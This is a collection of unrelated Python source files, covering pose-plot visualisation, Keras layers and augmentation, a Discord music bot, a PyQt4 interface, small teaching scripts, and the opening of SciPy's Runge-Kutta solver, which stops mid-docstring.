# Get rid of the panes (actually, make them white)
white = (1.0, 1.0, 1.0, 0.0)
ax.w_xaxis.set_pane_color(white)
ax.w_yaxis.set_pane_color(white)
# Get rid of the lines in 3d
ax.w_xaxis.line.set_color(white)
ax.w_yaxis.line.set_color(white)
ax.w_zaxis.line.set_color(white)
ax.invert_zaxis()
return
def re_order(skeleton):
skeleton = skeleton.copy().reshape(-1,3)
# permute the order of x,y,z axis
skeleton[:,[0,1,2]] = skeleton[:, [0,2,1]]
return skeleton.reshape(96)
def plot_3d_ax(ax,
elev,
azim,
pred,
title=None
):
ax.view_init(elev=elev, azim=azim)
show3Dpose(re_order(pred), ax)
plt.title(title)
return
def adjust_figure(left = 0,
right = 1,
bottom = 0.01,
top = 0.95,
wspace = 0,
hspace = 0.4
):
plt.subplots_adjust(left, bottom, right, top, wspace, hspace)
return
for image_name in data_dic.keys():
print("0. ", end= " -> ")
image_path = './imgs/' + image_name
print("1.", image_path, end= " -> ")
img = imageio.imread(image_path)
print("2.", img.shape, end= " -> ")
f = plt.figure(figsize=(9, 3))
print("3.", end= " -> ")
ax1 = plt.subplot(131)
print("4.", end= " -> ")
ax1.imshow(img)
plt.title('Input image')
ax2 = plt.subplot(132)
plt.title('2D key-point inputs: {:d}*2'.format(num_joints))
ax2.set_aspect('auto')
ax2.invert_yaxis()
skeleton_pred = None
skeleton_2d = data_dic[image_name]['p2d']
# The order for the 2D keypoints is:
# 'Hip', 'RHip', 'RKnee', 'RFoot', 'LHip', 'LKnee', 'LFoot', 'Spine',
# 'Thorax', 'Neck/Nose', 'Head', 'LShoulder', 'LElbow', 'LWrist', 'RShoulder'
# 'RElbow', 'RWrist'
print("5. Draw 2D keypoints", end= " -> ")
draw_skeleton(ax2, skeleton_2d, True)
    plt.plot(skeleton_2d[:,0], skeleton_2d[:,1], 'ro', markersize=2)
    # Nose was not used for this example model
norm_ske_gt = normalize(skeleton_2d, re_order_indices).reshape(1,-1)
pred = get_pred(cascade, torch.from_numpy(norm_ske_gt.astype(np.float32)))
pred = unNormalizeData(pred.data.numpy(),
stats['mean_3d'],
stats['std_3d'],
stats['dim_ignore_3d']
)
ax3 = plt.subplot(133, projection='3d')
print("6. Draw 3D keypoints")
plot_3d_ax(ax=ax3,
pred=pred,
elev=10.,
azim=-90,
title='3D prediction'
)
adjust_figure(left = 0.05,
right = 0.95,
bottom = 0.08,
top = 0.92,
wspace = 0.3,
hspace = 0.3
)
print(count)
time.sleep(0.5)
count += 1
if count >= total_to_show:
break |
# Copyright (c) 2020 Jason Dsouza <jasmcaus@gmail.com>
# Protected under the MIT License (see LICENSE)
# Suppressing Tensorflow Warnings
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# 0 = all messages are logged (default behavior)
# 1 = INFO messages are not printed
# 2 = INFO and WARNING messages are not printed
# 3 = INFO, WARNING, and ERROR messages are not printed
# Importing the necessary packages
from tensorflow.keras.preprocessing.image import ImageDataGenerator as imgdatgen
def imageDataGenerator():
"""
We are not adding a 'rescale' attribute because the data has already been normalized using the 'normalize' function of this class
Returns datagen
"""
datagen = imgdatgen(rotation_range=10,
width_shift_range=.1,
height_shift_range=.1,
shear_range=.2,
zoom_range=.2,
horizontal_flip=True,
fill_mode='nearest')
# We do not augment the validation data
# val_datagen = ImageDataGenerator()
# return train_datagen, val_datagen
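    # Hedged usage sketch (x_train/y_train are illustrative names, not part of
    # this module):
    #   datagen = imageDataGenerator()
    #   for x_batch, y_batch in datagen.flow(x_train, y_train, batch_size=32):
    #       ...  # train on augmented batches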
return datagen |
import mmapi
def vectori_to_list(vi):
"""convert a SWIG vectori object to a Python list"""
sz = vi.size()
lst = []
for i in xrange(0,sz):
lst.append( vi[i] )
return lst
def vectorub_to_string(vub):
"""convert a SWIG vectorub object to a Python string"""
sz = vub.size()
lst = []
for i in xrange(0,sz-1): # skip trailing null
lst.append( vub[i] )
    return str(bytearray(lst))
def to_vec3f(vec):
p = mmapi.vec3f()
p.x = vec[0]
p.y = vec[1]
p.z = vec[2]
return p
def to_vec3i(vec):
p = mmapi.vec3i()
p.i = vec[0]
p.j = vec[1]
p.k = vec[2]
return p
def to_mat3f(m_in):
"""convert 9-tuple to mmapi.mat3f"""
m = mmapi.mat3f()
for i in xrange(0,9):
m.m[i] = m_in[i]
return m
def to_world_xyz(remote, x,y,z):
"""convert a 3D point from Scene space to World space"""
vScene = mmapi.floatArray(3)
vScene[0] = x
vScene[1] = y
vScene[2] = z
cmd2 = mmapi.StoredCommands()
ckey = cmd2.AppendQueryCommand_ConvertPointToWorld(vScene)
    remote.runCommand(cmd2)
vWorld = mmapi.floatArray(3)
cmd2.GetQueryResult_ConvertPointToWorld(ckey, vWorld)
return (vWorld[0],vWorld[1],vWorld[2])
def to_world_f(remote, f):
"""convert a scalar dimension from Scene space to World space"""
cmd2 = mmapi.StoredCommands()
ckey = cmd2.AppendQueryCommand_ConvertScalarToWorld(f)
    remote.runCommand(cmd2)
vWorld = mmapi.floatArray(1)
cmd2.GetQueryResult_ConvertScalarToWorld(ckey, vWorld)
return vWorld[0]
def to_world(remote, v):
"""convert input from Scene space to World space (dimension or 3D point)"""
if ( isinstance(v,float) ):
return to_world_f(remote, v)
else:
return to_world_xyz(remote, v[0],v[1],v[2])
def toW(remote, v):
"""same as to_world(), but shorter"""
return to_world(remote,v)
def to_scene_xyz(remote, x,y,z):
"""convert a 3D point from World space to Scene space"""
vWorld = mmapi.floatArray(3)
vWorld[0] = x
vWorld[1] = y
vWorld[2] = z
cmd2 = mmapi.StoredCommands()
ckey = cmd2.AppendQueryCommand_ConvertPointToScene(vWorld)
    remote.runCommand(cmd2)
vScene = mmapi.floatArray(3)
cmd2.GetQueryResult_ConvertPointToScene(ckey, vScene)
return (vScene[0],vScene[1],vScene[2])
def to_scene_f(remote, f):
"""convert a scalar dimension from World space to Scene space"""
cmd2 = mmapi.StoredCommands()
ckey = cmd2.AppendQueryCommand_ConvertScalarToScene(f)
    remote.runCommand(cmd2)
vScene = mmapi.floatArray(1)
cmd2.GetQueryResult_ConvertScalarToScene(ckey, vScene)
return vScene[0]
def to_scene(remote, v):
"""convert input from World space to Scene space (dimension or 3D point)"""
if ( isinstance(v,float) ):
return to_scene_f(remote, v)
else:
return to_scene_xyz(remote, v[0],v[1],v[2])
def toS(remote, v):
"""same as to_scene(), but shorter"""
return to_scene(remote,v)
|
#!/usr/bin/env python
"用匿名管道从子进程向父进程发送数据,并将管道描述符封装进文件对象"
import os
import time
def child(pipe_out_int):
"子进程"
sleep_int = 0
while True:
# time.sleep(0.01) # 防止向管道输出端发送的数据流重叠
time.sleep(sleep_int) # 模拟实际工作,让父进程等待
msg_bytes = ('Spam {}\n'.format(sleep_int)).encode() # 管道是二进制字节
os.write(pipe_out_int, msg_bytes) # 发送到父进程
sleep_int += 1
sleep_int %= 5 # 0到4,4到0
def main():
pipe_in_int, pipe_out_int = os.pipe() # 创建两个末端的管道
if os.fork() == 0: # 复制此进程
os.close(pipe_in_int) # 在此关闭输入端
child(pipe_out_int) # 在副本中运行child()
else:
os.close(pipe_out_int) # 在此关闭输出端
pipe_in_fdfile = os.fdopen(pipe_in_int) # 创建文本模式输入文件对象
while True:
msg_bytes = pipe_in_fdfile.readline()[:-1] # 数据发送之前保持阻塞
print('Parent {} got [{}] at {}'.format(
os.getpid(), msg_bytes, time.time()
))
if __name__ == '__main__':
main()
|
from syft.interfaces.keras import actual_keras
def load_data():
return actual_keras.keras.datasets.mnist.load_data() |
from webpie import WPApp, WPHandler, HTTPServer, HTTPSServer
class H(WPHandler):
def redirect1(self, request, relpath, to=None):
return "redirect", 301, {"Location":to}
def redirect2(self, request, relpath, to=None):
print("app: request.path_url:", request.path_url)
self.redirect(to)
WPApp(H).run_server(8888) |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from keras import layers
from keras.utils.generic_utils import register_keras_serializable
from keras.utils.tf_utils import shape_type_conversion
@register_keras_serializable(package='Miss')
class L2Scale(layers.Layer):
"""L2-constrained and scaled layer.
Reference: https://arxiv.org/pdf/1703.09507.pdf
L2-constrained Softmax Loss for Discriminative Face Verification
Rajeev Ranjan, Carlos D. Castillo and Rama Chellappa (2017)
Notes
    As mentioned in the paper, a theoretically good `alpha` can be estimated as `log(p * (C - 2) / (1 - p))`, where `p`
    is the average softmax probability of correctly classifying a feature and `C` is the number of classes.
    Usually a good `alpha` falls in the range [10, 30].
"""
def __init__(self, alpha=20., **kwargs):
super(L2Scale, self).__init__(**kwargs)
self.input_spec = layers.InputSpec(min_ndim=2)
self.supports_masking = True
self._supports_ragged_inputs = True
self.alpha = alpha
@shape_type_conversion
def build(self, input_shape):
if len(input_shape) < 2:
raise ValueError('Shape {} must have rank >= 2'.format(input_shape))
num_channels = input_shape[-1]
if num_channels is None:
raise ValueError('Channel dimension of the inputs should be defined. Found `None`.')
self.input_spec = layers.InputSpec(ndim=len(input_shape), axes={-1: num_channels})
super(L2Scale, self).build(input_shape)
def call(self, inputs, **kwargs):
if isinstance(inputs, tf.RaggedTensor):
normalized = tf.ragged.map_flat_values(tf.math.l2_normalize, inputs, axis=-1)
else:
normalized = tf.math.l2_normalize(inputs, axis=-1)
alpha = tf.cast(self.alpha, inputs.dtype)
return normalized * alpha
@shape_type_conversion
def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = super(L2Scale, self).get_config()
config.update({'alpha': self.alpha})
return config
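# Minimal sanity-check sketch (hedged; assumes TensorFlow is importable and
# eager execution is on): after L2Scale, every row of the output should have
# an L2 norm equal to `alpha`.
if __name__ == '__main__':
    import numpy as np
    layer = L2Scale(alpha=20.)
    out = layer(tf.constant(np.random.rand(4, 8), dtype=tf.float32))
    print(tf.norm(out, axis=-1).numpy())  # approximately [20. 20. 20. 20.]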
|
import math
def cut_evenly(weights, threshold):
min_weight = min(weights)
weights = [w / min_weight for w in weights]
intervals = [None] * len(weights)
base_cuts = 0
    for i, weight in enumerate(weights):
        if weight > 1:
            a, b = weight * threshold, weight / threshold
            intervals[i] = (a, b)
            for coefficient in range(1, math.ceil(1 / (b - a)) + 1):
                # scale the interval by the candidate coefficient without
                # overwriting (a, b), so each coefficient is tried against
                # the original interval
                scaled_a, scaled_b = coefficient * a, coefficient * b
                min_integer = math.ceil(scaled_a)
                if min_integer == int(scaled_a):
                    min_integer += 1
                if min_integer < scaled_b:
                    base_cuts = max(base_cuts, coefficient - 1)
                    break
while True:
coefficient = base_cuts + 1
min_total_cuts = 0
for interval in intervals:
if interval is None:
min_total_cuts += base_cuts
else:
a, b = coefficient * interval[0], coefficient * interval[1]
min_integer = math.ceil(a)
if min_integer == int(a):
min_integer += 1
if min_integer < b:
min_total_cuts += min_integer - 1
else:
break
else:
break
        base_cuts += 1
return min_total_cuts
if __name__ == "__main__":
threshold, _ = input().strip().split(" ")
threshold = float(threshold)
veggies = [int(weight) for weight in input().strip().split(" ")]
min_cuts = cut_evenly(veggies, threshold)
print(min_cuts)
|
"""
Migration script to add the post_job_action_association table.
"""
from sqlalchemy import *
from migrate import *
from migrate.changeset import *
from galaxy.model.custom_types import *
import datetime
now = datetime.datetime.utcnow
import logging
log = logging.getLogger( __name__ )
metadata = MetaData( migrate_engine )
PostJobActionAssociation_table = Table("post_job_action_association", metadata,
Column("id", Integer, primary_key=True),
Column("post_job_action_id", Integer, ForeignKey("post_job_action.id"), index=True, nullable=False),
Column("job_id", Integer, ForeignKey("job.id"), index=True, nullable=False))
def upgrade():
print __doc__
metadata.reflect()
try:
PostJobActionAssociation_table.create()
except Exception, e:
log.debug( "Creating PostJobActionAssociation table failed: %s" % str( e ) )
def downgrade():
# Load existing tables
metadata.reflect()
try:
PostJobActionAssociation_table.drop()
except Exception, e:
log.debug( "Dropping PostJobActionAssociation table failed: %s" % str( e ) )
|
from typing import List, Tuple
from mypy.plugin import Plugin
from mypy.nodes import MypyFile
class DepsPlugin(Plugin):
def get_additional_deps(self, file: MypyFile) -> List[Tuple[int, str, int]]:
if file.fullname == '__main__':
return [(10, 'err', -1)]
return []
def plugin(version):
return DepsPlugin
|
# imported for working with punctuation marks
import string
# regular expressions live here; the pattern syntax is a bit like SQL matching
import re
# for reducing words to their base (normal) form
import pymorphy2
text = open('texst_lesson_3.txt', 'r', encoding='UTF-8')  # on Windows the encoding must be given explicitly, otherwise it fails
text_1 = text.read()
'''Check that the text was read correctly.'''
print(text_1)
print('1) strip punctuation from the text using string methods;')
text_2 = text_1.translate(str.maketrans('', '', string.punctuation))
print(text_2)
# this way is more efficient; the alternative is to do it less efficiently by hand
text_3 = re.sub(r'[^\w\s]', '', text_1)
print(text_3)
print('2) build a list of words (split);')
# for convenience, take the original text and split it into sentences (periods as separators)
arr_2 = text_1.split('.')
print(arr_2)
print('3) convert all words to lower case (map);')
text_4 = list(map(lambda m: m.lower(), arr_2))
print(text_4)
print('4) print the 5 most frequent words (sort) and the number of distinct words in the text (set).')
# first get a list of the words in the text: split the punctuation-free text on whitespace
arr_3 = text_2.split()
# lower-case everything so capitalized and lower-case forms of a word are counted together
arr_3 = list(map(lambda m: m.lower(), arr_3))
print(arr_3)
# reduce the words to their normal form
arr_4 = []
morph = pymorphy2.MorphAnalyzer()
for word in arr_3:
    p = morph.parse(word)[0]
    arr_4.append(p.normal_form)
print('words reduced to their normal form')
print(arr_4)
# build a dictionary counting how many times each word occurs in the text
word_counts = {a: arr_4.count(a) for a in arr_4}
print(word_counts)
# 5 most frequent words
sort_list = list(word_counts.items())
sort_list.sort(key=lambda i: i[1], reverse=True)
print('5 most frequent words')
print(sort_list[:5])
# number of distinct words in the text
text_set = set(arr_4)
print('Number of distinct words in the text')
print(len(text_set))
|
# -*- coding: utf-8 -*-
"""
UNIVERSIDAD EL BOSQUE
INTEGRATED PROJECT - TRANSFORMS / TRANSDUCERS
PEDRO GUILLEM
LUISA ECHEVERRY
DIANA NUNEZ
Copyright:
Author: PEDRO GUILLEM
Generated using PyQt4 from ui_plot.ui
"""
# Form implementation generated from reading ui file 'ui_plot.ui'
#
# Created: Sat Nov 5 22:10:24 2016
# by: PyQt4 UI code generator 4.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(900, 600)
MainWindow.setMinimumSize(QtCore.QSize(900, 0))
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.realtimeData = QtGui.QGroupBox(self.centralwidget)
self.realtimeData.setGeometry(QtCore.QRect(10, 10, 611, 551))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(8)
font.setBold(True)
font.setWeight(65)
self.realtimeData.setFont(font)
self.realtimeData.setObjectName(_fromUtf8("realtimeData"))
self.audioPCM = PlotWidget(self.realtimeData)
self.audioPCM.setGeometry(QtCore.QRect(10, 30, 591, 201))
self.audioPCM.setObjectName(_fromUtf8("audioPCM"))
        self.audioPCM.setLabel('left','Amplitude (mV)')
        self.audioPCM.setLabel('bottom','Time','s')
        self.audioPCM.setTitle('Microphone Audio - PCM 16-bit - Signed Integer (Little Endian)')
self.audioFFT = PlotWidget(self.realtimeData)
self.audioFFT.setGeometry(QtCore.QRect(10, 240, 591, 301))
self.audioFFT.setObjectName(_fromUtf8("audioFFT"))
        self.audioFFT.setLabel('left','Amplitude','dB')
        self.audioFFT.setLabel('bottom','Frequency (4096 points)','Hz')
        self.audioFFT.setTitle('Discrete Fourier Transform (Log10)')
self.controlData = QtGui.QGroupBox(self.centralwidget)
self.controlData.setGeometry(QtCore.QRect(630, 160, 261, 401))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(10)
font.setBold(True)
font.setWeight(65)
self.controlData.setFont(font)
self.controlData.setObjectName(_fromUtf8("controlData"))
self.cancelData = PlotWidget(self.controlData)
self.cancelData.setGeometry(QtCore.QRect(10, 230, 241, 161))
self.cancelData.setObjectName(_fromUtf8("cancelData"))
        self.cancelData.setLabel('left','Amplitude','dB')
        self.cancelData.setLabel('bottom','Time')
        self.cancelData.setTitle('Anti-Tone')
self.btnDetectar = QtGui.QPushButton(self.controlData)
self.btnDetectar.setGeometry(QtCore.QRect(40, 30, 171, 23))
font = QtGui.QFont()
font.setPointSize(7)
font.setBold(False)
font.setWeight(50)
self.btnDetectar.setFont(font)
self.btnDetectar.setObjectName(_fromUtf8("btnDetectar"))
self.btnCancelar = QtGui.QPushButton(self.controlData)
self.btnCancelar.setGeometry(QtCore.QRect(40, 200, 171, 23))
font = QtGui.QFont()
font.setPointSize(7)
font.setBold(False)
self.btnCancelar.setFont(font)
self.btnCancelar.setObjectName(_fromUtf8("btnCancelar"))
self.dataLog = QtGui.QTextBrowser(self.controlData)
self.dataLog.setFont(font)
self.dataLog.setGeometry(QtCore.QRect(10, 60, 241, 131))
self.dataLog.setObjectName(_fromUtf8("dataLog"))
self.tprincipal = QtGui.QLabel(self.centralwidget)
self.tprincipal.setGeometry(QtCore.QRect(630, 10, 251, 21))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(12)
self.tprincipal.setFont(font)
self.tprincipal.setObjectName(_fromUtf8("tprincipal"))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(10)
self.tproyecto = QtGui.QLabel(self.centralwidget)
self.tproyecto.setGeometry(QtCore.QRect(630, 30, 151, 16))
self.tproyecto.setObjectName(_fromUtf8("tproyecto"))
self.tproyecto.setFont(font)
self.tproyecto2 = QtGui.QLabel(self.centralwidget)
self.tproyecto2.setFont(font)
self.tproyecto2.setGeometry(QtCore.QRect(630, 40, 181, 16))
self.tproyecto2.setObjectName(_fromUtf8("tproyecto2"))
self.pedro = QtGui.QLabel(self.centralwidget)
self.pedro.setGeometry(QtCore.QRect(630, 70, 161, 16))
self.pedro.setObjectName(_fromUtf8("pedro"))
self.pedro.setFont(font)
self.luisa = QtGui.QLabel(self.centralwidget)
self.luisa.setGeometry(QtCore.QRect(630, 80, 161, 16))
self.luisa.setObjectName(_fromUtf8("luisa"))
self.luisa.setFont(font)
self.diana = QtGui.QLabel(self.centralwidget)
self.diana.setGeometry(QtCore.QRect(630, 90, 161, 16))
self.diana.setObjectName(_fromUtf8("diana"))
self.diana.setFont(font)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 900, 18))
self.menubar.setObjectName(_fromUtf8("menubar"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
        MainWindow.setWindowTitle(_translate("MainWindow", "Integrated Project - Pure Tone Canceller v0.1", None))
        self.realtimeData.setTitle(_translate("MainWindow", "REAL-TIME ANALYSIS", None))
        self.controlData.setTitle(_translate("MainWindow", "CONTROL", None))
        self.btnDetectar.setToolTip(_translate("MainWindow", "<html><head/><body><p>Start pure tone detection</p></body></html>", None))
        self.btnDetectar.setText(_translate("MainWindow", "START DETECTION", None))
        self.btnCancelar.setToolTip(_translate("MainWindow", "<html><head/><body><p>Enable/disable the tone canceller</p></body></html>", None))
        self.btnCancelar.setText(_translate("MainWindow", "ENABLE CANCELLER", None))
        self.tprincipal.setText(_translate("MainWindow", "Universidad el Bosque", None))
        self.tproyecto.setText(_translate("MainWindow", "Integrated Project", None))
        self.tproyecto2.setText(_translate("MainWindow", "Transforms / Transducers", None))
        self.pedro.setText(_translate("MainWindow", "PEDRO GUILLEM", None))
        self.luisa.setText(_translate("MainWindow", "LUISA ECHEVERRY", None))
        self.diana.setText(_translate("MainWindow", "DIANA NUÑEZ", None))
from pyqtgraph import PlotWidget
|
#!/usr/bin/python3
import sys
# sum the per-line values for each key (username) to get each user's totals
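# Expected stdin format (whitespace-separated, grouped/sorted by username):
#   <username> <value> <ups> <downs>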
word = None
count = 0
upvotes = 0
downvotes = 0
for line in sys.stdin:
    username, value, ups, downs = line.strip().split()
    if word is None:  # true only for the very first line
        word = username
    elif word != username:  # username changed: emit the totals and reset for the next user
        print(word, count, upvotes, downvotes, sep='\t')
        word = username
        count = 0
        upvotes = 0
        downvotes = 0
    count += int(value)
    upvotes += int(ups)
    downvotes += int(downs)
print(word, count, upvotes, downvotes, sep='\t')
|
import hikari
import tanjun
import os
import logging
from dotenv import load_dotenv
import lavasnek_rs
load_dotenv()
DISCORD_TOKEN = os.getenv("DISCORD_TOKEN")
LAVALINK_HOST = os.getenv("LAVALINK_HOST")
LAVALINK_PASSWORD = os.getenv("LAVALINK_PASSWORD")
LAVALINK_PORT = os.getenv("LAVALINK_PORT")
logging.basicConfig(level=logging.INFO)
class EventHandler:
"""Handles events from the Lavalink server."""
async def track_start(self, _: lavasnek_rs.Lavalink, event: lavasnek_rs.TrackStart) -> None:
"""Handles track start events."""
print(f"Track started on guild: {event.guild_id}")
async def track_finish(self, _: lavasnek_rs.Lavalink, event: lavasnek_rs.TrackFinish) -> None:
"""Handles track finish events."""
print(f"Track finished on guild: {event.guild_id}")
async def track_exception(self, lavalink: lavasnek_rs.Lavalink, event: lavasnek_rs.TrackException) -> None:
"""Handles track exception events."""
print(f"Track exception event happened on guild: {event.guild_id}")
# If a track was unable to be played, skip it
skip = await lavalink.skip(event.guild_id)
node = await lavalink.get_guild_node(event.guild_id)
if skip and node:
if not node.queue and not node.now_playing:
await lavalink.stop(event.guild_id)
bot = hikari.GatewayBot(DISCORD_TOKEN)
client = tanjun.Client.from_gateway_bot(
bot, declare_global_commands=True, mention_prefix=True)
@client.with_listener(hikari.ShardReadyEvent)
async def on_shard_ready(
event: hikari.ShardReadyEvent,
client_: tanjun.Client = tanjun.injected(type=tanjun.Client),
) -> None:
"""Event that triggers when the hikari gateway is ready."""
builder = (
lavasnek_rs.LavalinkBuilder(event.my_user.id, DISCORD_TOKEN)
.set_host(LAVALINK_HOST)
.set_password(LAVALINK_PASSWORD)
.set_port(int(LAVALINK_PORT))
.set_start_gateway(False)
# We set start gateway False because hikari can handle
# voice events for us.
)
# Here we add lavasnek_rs.Lavalink as a type dependency to the client
# We will use this later to have access to it in all our commands
client_.set_type_dependency(lavasnek_rs.Lavalink, await builder.build(EventHandler))
@client.with_listener(hikari.VoiceStateUpdateEvent)
async def on_voice_state_update(
event: hikari.VoiceStateUpdateEvent,
lavalink: lavasnek_rs.Lavalink = tanjun.injected(type=lavasnek_rs.Lavalink),
) -> None:
"""Passes voice state updates to lavalink."""
await lavalink.raw_handle_event_voice_state_update(
event.state.guild_id,
event.state.user_id,
event.state.session_id,
event.state.channel_id,
)
@client.with_listener(hikari.VoiceServerUpdateEvent)
async def on_voice_server_update(
event: hikari.VoiceServerUpdateEvent,
lavalink: lavasnek_rs.Lavalink = tanjun.injected(type=lavasnek_rs.Lavalink),
) -> None:
"""Passes voice server updates to lavalink."""
if event.endpoint is not None:
await lavalink.raw_handle_event_voice_server_update(
event.guild_id,
event.endpoint,
event.token,
)
@bot.listen(hikari.StartedEvent)
async def on_started(event: hikari.StartedEvent) -> None:
print("Hashashin is online!")
for filename in os.listdir("./modules"):
if filename.endswith('.py'):
client.load_modules(f"modules.{filename[:-3]}")
bot.run()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of SyncBoom and is MIT-licensed.
# Originally based on microblog, licensed under the MIT License.
from flask import render_template, current_app
from flask_babel import _
from app.email import send_email
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email(_('[SyncBoom] Reset Your Password'),
sender=current_app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
|
import numpy as np
from .base import OdeSolver, DenseOutput
from .common import (validate_max_step, validate_tol, select_initial_step,
norm, warn_extraneous, validate_first_step)
from . import dop853_coefficients
# Multiply steps computed from asymptotic behaviour of errors by this.
SAFETY = 0.9
MIN_FACTOR = 0.2 # Minimum allowed decrease in a step size.
MAX_FACTOR = 10 # Maximum allowed increase in a step size.
def rk_step(fun, t, y, f, h, A, B, C, K):
"""Perform a single Runge-Kutta step.
This function computes a prediction of an explicit Runge-Kutta method and
also estimates the error of a less accurate method.
Notation for Butcher tableau is as in [1]_.
Parameters
----------
fun : callable
Right-hand side of the system.
t : float
Current time.
y : ndarray, shape (n,)
Current state.
f : ndarray, shape (n,)
        Current value of the derivative, i.e., ``fun(t, y)``.
h : float
Step to use.
A : ndarray, shape (n_stages, n_stages)
Coefficients for combining previous RK stages to compute the next
stage. For explicit methods the coefficients at and above the main
diagonal are zeros.
B : ndarray, shape (n_stages,)
Coefficients for combining RK stages for computing the final
prediction.
C : ndarray, shape (n_stages,)
Coefficients for incrementing time for consecutive RK stages.
The value for the first stage is always zero.
K : ndarray, shape (n_stages + 1, n)
Storage array for putting RK stages here. Stages are stored in rows.
The last row is a linear combination of the previous rows with
        coefficients.
Returns
-------
y_new : ndarray, shape (n,)
Solution at t + h computed with a higher accuracy.
f_new : ndarray, shape (n,)
Derivative ``fun(t + h, y_new)``.
References
----------
.. [1] E. Hairer, S. P. Norsett G. Wanner, "Solving Ordinary Differential
Equations I: Nonstiff Problems", Sec. II.4.
"""
K[0] = f
for s, (a, c) in enumerate(zip(A[1:], C[1:]), start=1):
dy = np.dot(K[:s].T, a[:s]) * h
K[s] = fun(t + c * h, y + dy)
y_new = y + h * np.dot(K[:-1].T, B)
f_new = fun(t + h, y_new)
K[-1] = f_new
return y_new, f_new
class RungeKutta(OdeSolver):
"""Base class for explicit Runge-Kutta methods."""
C = NotImplemented
A = NotImplemented
B = NotImplemented
E = NotImplemented
P = NotImplemented
order = NotImplemented
error_estimator_order = NotImplemented
n_stages = NotImplemented
def __init__(self, fun, t0, y0, t_bound, max_step=np.inf,
rtol=1e-3, atol=1e-6, vectorized=False,
first_step=None, **extraneous):
warn_extraneous(extraneous)
super(RungeKutta, self).__init__(fun, t0, y0, t_bound, vectorized,
support_complex=True)
self.y_old = None
self.max_step = validate_max_step(max_step)
self.rtol, self.atol = validate_tol(rtol, atol, self.n)
self.f = self.fun(self.t, self.y)
if first_step is None:
self.h_abs = select_initial_step(
self.fun, self.t, self.y, self.f, self.direction,
self.error_estimator_order, self.rtol, self.atol)
else:
self.h_abs = validate_first_step(first_step, t0, t_bound)
self.K = np.empty((self.n_stages + 1, self.n), dtype=self.y.dtype)
self.error_exponent = -1 / (self.error_estimator_order + 1)
self.h_previous = None
def _estimate_error(self, K, h):
return np.dot(K.T, self.E) * h
def _estimate_error_norm(self, K, h, scale):
return norm(self._estimate_error(K, h) / scale)
def _step_impl(self):
t = self.t
y = self.y
max_step = self.max_step
rtol = self.rtol
atol = self.atol
min_step = 10 * np.abs(np.nextafter(t, self.direction * np.inf) - t)
if self.h_abs > max_step:
h_abs = max_step
elif self.h_abs < min_step:
h_abs = min_step
else:
h_abs = self.h_abs
step_accepted = False
step_rejected = False
while not step_accepted:
if h_abs < min_step:
return False, self.TOO_SMALL_STEP
h = h_abs * self.direction
t_new = t + h
if self.direction * (t_new - self.t_bound) > 0:
t_new = self.t_bound
h = t_new - t
h_abs = np.abs(h)
y_new, f_new = rk_step(self.fun, t, y, self.f, h, self.A,
self.B, self.C, self.K)
scale = atol + np.maximum(np.abs(y), np.abs(y_new)) * rtol
error_norm = self._estimate_error_norm(self.K, h, scale)
if error_norm < 1:
if error_norm == 0:
factor = MAX_FACTOR
else:
factor = min(MAX_FACTOR,
SAFETY * error_norm ** self.error_exponent)
if step_rejected:
factor = min(1, factor)
h_abs *= factor
step_accepted = True
else:
h_abs *= max(MIN_FACTOR,
SAFETY * error_norm ** self.error_exponent)
step_rejected = True
self.h_previous = h
self.y_old = y
self.t = t_new
self.y = y_new
self.h_abs = h_abs
self.f = f_new
return True, None
def _dense_output_impl(self):
Q = self.K.T.dot(self.P)
return RkDenseOutput(self.t_old, self.t, self.y_old, Q)
class RK23(RungeKutta):
"""Explicit Runge-Kutta method of order 3(2).
This uses the Bogacki-Shampine pair of formulas [1]_. The error is controlled
assuming accuracy of the second-order method, but steps are taken using the
third-order accurate formula (local extrapolation is done). A cubic Hermite
polynomial is used for the dense output.
Can be applied in the complex domain.
Parameters
----------
fun : callable
Right-hand side of the system. The calling signature is ``fun(t, y)``.
Here ``t`` is a scalar and there are two options for ndarray ``y``.
It can either have shape (n,), then ``fun`` must return array_like with
shape (n,). Or alternatively it can have shape (n, k), then ``fun``
must return array_like with shape (n, k), i.e. each column
corresponds to a single column in ``y``. The choice between the two
options is determined by `vectorized` argument (see below).
t0 : float
Initial time.
y0 : array_like, shape (n,)
Initial state.
t_bound : float
Boundary time - the integration won't continue beyond it. It also
determines the direction of the integration.
first_step : float or None, optional
Initial step size. Default is ``None`` which means that the algorithm
should choose.
max_step : float, optional
Maximum allowed step size. Default is np.inf, i.e., the step size is not
bounded and determined solely by the solver.
rtol, atol : float and array_like, optional
Relative and absolute tolerances. The solver keeps the local error
estimates less than ``atol + rtol * abs(y)``. Here, `rtol` controls a
relative accuracy (number of correct digits). But if a component of `y`
is approximately below `atol`, the error only needs to fall within
the same `atol` threshold, and the number of correct digits is not
